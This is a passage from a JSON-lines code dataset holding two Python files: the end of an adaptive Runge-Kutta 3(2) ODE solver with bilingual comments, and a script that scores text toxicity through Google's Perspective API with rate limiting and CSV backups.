initial point --- начальная точка\n tfin: end time point --- конечная точка по времени\n hmax: maximal step-size --- максимальная длина шага\n tol: local absolute tolerance --- локальная погрешность\n \"\"\"\n st = stats() # statistics instance --- статистика по шагам и вычислениям\n\n # initial step-size\n p = 3\n a = max(np.abs(t0), np.abs(tfin))\n b = np.linalg.norm(f(t0, y0))\n st.nfevals = 1\n delta = np.power(1 / a, p + 1) + np.power(b, p + 1)\n h = np.power(tol / delta, 1 / (p + 1))\n if h > hmax:\n h = hmax\n\n # T # times in the mesh points --- абсциссы точек сетки\n # Y # values in the mesh points --- решение в точках сетки\n T = [t0]\n Y = [y0]\n fac_min = 0.5\n fac_max = 3\n factor = 0.9\n\n new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n st.nfevals += 3\n\n while np.linalg.norm(error) > tol:\n st.trej += 1\n h = h / 2\n new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n # !!!!! st.nfevals += 3\n\n\n Y.append(new_y)\n T.append(T[-1] + h)\n\n while T[-1] + h < tfin:\n\n tmp = np.power(tol / np.linalg.norm(error), 1 / p)\n h = h * max(fac_min, min(fac_max, factor * tmp))\n new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n st.nfevals += 3\n while np.linalg.norm(error) > tol:\n st.trej += 1\n h /= 2\n new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n # !!!!! st.nfevals += 3\n Y.append(new_y)\n T.append(T[-1] + h)\n\n # last step\n h = tfin - T[-1]\n new_y, error = rk32fstep(f, T[-1], Y[-1], h)\n st.nfevals += 3\n Y.append(new_y)\n T.append(tfin)\n\n st.nsteps += len(T) - 1\n\n return np.array(T), np.array(Y).transpose(), st\n\n# Embedded RK3(2) method with FSAL: one step (similar to ode23 in matlab)\ndef rk32fstep(f, t0, y0, h):\n \"\"\"\n f: right-hand side of the equation --- правая часть диффура (функция)\n t0, y0: initial point of the step --- начальная точка шага\n h: step-size --- длина шага\n \"\"\"\n \"\"\"\n 0 |\n 1 | 1\n 1/2 | 1/4 1/4\n ----+-------------------\n y2 | 1/2 1/2\n y1 | 1/6 1/6 2/3\n \"\"\"\n c2 = 1\n c3 = 1/2\n\n a21 = 1\n a31 = 1/4; a32 = 1/4\n\n b11 = 1/2; b12 = 1/2\n b21 = 1/6; b22 = 1/6; b23 = 2/3\n\n t1 = t0 + c2 * h\n t2 = t0 + c3 * h\n\n k1 = f(t0, y0)\n k2 = f(t1, y0 + a21*h*k1)\n k3 = f(t2, y0 + a31*h*k1 + a32*h*k2)\n\n # Approximation by the main method of order 3 at t0 + h --- Приближение методом 3-го порядка в t0 + h\n y1 = y0 + b21*h*k1 + b22*h*k2 + b23*h*k3\n # Approximation by the estimator of order 2 at t0 + h --- Приближение методом 2-го порядка в t0 + h\n y2 = y0 + b11*h*k1 + b12*h*k2\n\n # Error estimation\n err = y1 - y2\n\n return y1, err\n","repo_name":"sabzero43/numerical-methods","sub_path":"task8/ode.py","file_name":"ode.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37857410158","text":"import yaml\nimport json\nimport pandas as pd\nfrom tqdm import tqdm\nimport time\nfrom googleapiclient import discovery\nfrom argparse import ArgumentParser\n\nATTRIBUTE = 'TOXICITY'\nNAME_NEW_COL = 'pro_API_response_score'\nTIME_INTERVAL = .8 # prospective API limit the QPS (query per second) to 1 # https://console.cloud.google.com/iam-admin/quotas to check quota alerts\nTRIALS = 4 # number of times to iterate on the entire dataset\nBACKUP_EVERY = 25\n\n\ndef read_credential():\n with open('credentials.yaml', \"r\") as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n \n return cfg['google_cloud']\n\ndef get_status(df):\n return f\"{sum(df[NAME_NEW_COL] != -1)}/{len(df)}\"\n\ndef main(path_to_df):\n API_KEY = read_credential()\n client = discovery.build(\n \"commentanalyzer\",\n \"v1alpha1\",\n developerKey=API_KEY,\n discoveryServiceUrl=\"https://commentanalyzer.googleapis.com/$discovery/rest?version=v1alpha1\",\n static_discovery=False,\n )\n \n\n \n df = pd.read_csv(path_to_df, index_col=0)\n # create column w/ -1 scores as default\n if NAME_NEW_COL not in df.columns:\n df[NAME_NEW_COL] = -1\n\n consecutive_err = 0\n count = 0 # total values obtained during execution\n\n\n print(f\"Restored from {get_status(df)}\")\n n_response = 0\n\n for _ in range(TRIALS):\n pbar = pbar = tqdm(\n enumerate(df.iterrows()), \n desc=f\"status: {get_status(df)} | from last backup: {n_response} | last_backup: NaN\",\n total = len(df),\n )\n \n for it, (idx, row) in pbar:\n # if score is not assigned:\n if row[NAME_NEW_COL] < 0:\n time.sleep(TIME_INTERVAL)\n analyze_request = {\n 'comment': { 'text': row['responses']},\n 'requestedAttributes': {ATTRIBUTE: {},}\n }\n\n # catch HTTP errors\n try:\n response = client.comments().analyze(body=analyze_request).execute()\n # assign score\n df.at[idx, NAME_NEW_COL] = response['attributeScores'][ATTRIBUTE]['summaryScore']['value']\n n_response += 1\n count += 1\n consecutive_err = 0 # reset the counter for no response in a row\n except Exception as e:\n if 'LANGUAGE_NOT_SUPPORTED_BY_ATTRIBUTE' in str(e):\n df.at[idx, NAME_NEW_COL] = pd.NA\n # if HTTP error, pass and try next time\n pass\n \n # exit loop \n if sum(df[NAME_NEW_COL] == -1) == 0:\n print('\\n[x] No more scores to get')\n break\n \n # backup, overwrite\n if it % BACKUP_EVERY == 0:\n df.to_csv(path_to_df)\n pbar.set_description(f\"status: {get_status(df)} | from last backup: {n_response}/{BACKUP_EVERY} | last_backup: {it}it\")\n n_response = 0\n\n\n print(f'total scores obtained this loop: {count}')\n print()\n \n print(f'total scores in df: {get_status(df)}')\n print(f'total valid scores in df: {sum(df[NAME_NEW_COL] > 0)}/{len(df)}')\n # save csv\n df.to_csv(path_to_df)\n\n\n\n\nif __name__ == \"__main__\":\n \n parser = ArgumentParser(description='Get config file.')\n parser.add_argument('-p', '--path', required=True, \n help='Path to the CSV file')\n args = parser.parse_args()\n path_to_df = args.path\n\n\n main(path_to_df)","repo_name":"DanielSc4/RewardLM","sub_path":"rewardlm/data/prospectiveAPI_script.py","file_name":"prospectiveAPI_script.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}